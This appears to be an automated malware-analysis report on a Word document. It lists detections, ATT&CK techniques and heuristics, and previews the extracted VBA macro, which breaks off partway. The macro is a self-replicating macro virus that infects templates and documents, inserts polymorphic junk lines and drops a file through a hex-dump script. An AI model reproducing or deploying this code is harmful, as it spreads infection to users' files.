MALICIOUS
308
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro that executes upon opening (AutoOpen). The macro attempts to copy itself to other Word templates and documents found in the user's directories, indicating a self-spreading or worm-like behavior. It also attempts to copy itself to the user's recent documents folder, potentially to facilitate further infection or persistence.
Heuristics 7
-
ClamAV: Doc.Trojan.Npol-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Npol-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 65440 bytes |
SHA-256: 2497af07ec85e9dcb6ed5f3451631c42334ac2f8eafe725da026059a967355f5 |
|||
|
Detection
ClamAV:
Doc.Trojan.Npol-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "FF"
Private Sub AutoOpen()
On Error Resume Next
Randomize (Timer)
SpreadDir = Application.Path & "\"
Victim = Dir(SpreadDir & "\*.dot")
Application.OrganizerCopy ThisDocument.FullName, "C:\Test.dat", "FF", wdOrganizerObjectProjectItems
Do Until Victim = ""
SetAttr SpreadDir & Victim, vbNormal
Application.OrganizerCopy ThisDocument.FullName, SpreadDir & Victim, "FF", wdOrganizerObjectProjectItems
Victim = Dir
Loop
Application.OrganizerCopy ThisDocument.FullName, SpreadDir & "\*.doc", "FF", wdOrganizerObjectProjectItems
SpreadDir = Environ("WINDIR") & "\Recent"
Chk = Dir(recent & "\*.doc")
If Chk = True Then Application.OrganizerCopy ThisDocument.FullName, SpreadDir & "\*.doc", "FF", wdOrganizerObjectProjectItems
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "FF" Then GoTo AlreadyDone
Next i
Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "FF", wdOrganizerObjectProjectItems
AlreadyDone:
If Int(Rnd * 24) > Hour(Time) Then
MorphFactor = Int(Rnd * 10)
Select Case MorphFactor
Case 1
Fake = Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & CStr(Int(Rnd * 999999999))
Case 2
Fake = Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & Chr(58) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(58)
Case 3
Fake = "DoEvents"
Case 4
Fake = "'" & Application.UserName & Application.UserAddress & Application.ActivePrinter
Case 5
JumpPoint = Chr(Int(Rnd * 5) + 65) & Hex(CStr(Oct(MorphFactor ^ 4) & CStr(Day(Date)) & CStr(Minute(Time)) & CStr(Hour(Time))))
Fake = "Goto " & JumpPoint & Chr(13) & JumpPoint & ":"
Case 6
Fake = Chr(13)
Case 7
Fake = "For " & Chr(MorphFactor + 65) & " = 1 To 1" & Chr(13) & "Next " & Chr(MorphFactor + 65)
Case 8
Fake = "Rem"
Case 9
Fake = "If " & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & CStr(Int(Rnd * 45)) & "Then " & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & CStr(Int(Rnd * 45))
Case 10
Fake = "Do" & Chr(13) & "Exit Do" & Chr(13) & "Loop"
End Select
'ThisDocument.VBProject.VBComponents("FF").CodeModule.InsertLines Int(Rnd * ThisDocument.VBProject.VBComponents("FF").CodeModule.CountOfLines - 3) + 1, Fake
End If
Open Environ("WINDIR") & "\System\Bio.tmp" For Output As #1
Print #1, "N " & Environ("WINDIR") & "\System\" & "BIO.JPG"
Print #1, "E 0100 FF D8 FF E0 00 10 4A 46 49 46 00 01 01 00 00 01 "
Print #1, "E 0110 00 01 00 00 FF DB 00 43 00 35 25 28 2F 28 21 35 "
Print #1, "E 0120 2F 2B 2F 3C 39 35 3F 50 85 57 50 49 49 50 A3 75 "
Print #1, "E 0130 7B 61 85 C1 AA CB C8 BE AA BA B7 D5 F0 FF FF D5 "
Print #1, "E 0140 E2 FF E6 B7 BA FF FF FF FF FF FF FF FF FF CE FF "
Print #1, "E 0150 FF FF FF FF FF FF FF FF FF FF DB 00 43 01 39 3C "
Print #1, "E 0160 3C 50 46 50 9D 57 57 9D FF DC BA DC FF FF FF FF "
Print #1, "E 0170 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF "
Print #1, "E 0180 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF "
Print #1, "E 0190 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF C0 "
Print #1, "E 01A0 00 11 08 00 DB 01 33 03 01 22 00 02 11 01 03 11 "
Print #1, "E 01B0 01 FF C4 00 1F 00 00 01 05 01 01 01 01 01 01 00 "
Print #1, "E 01C0 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 "
Print #1, "E 01D0 0A 0B FF C4 00 B5
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.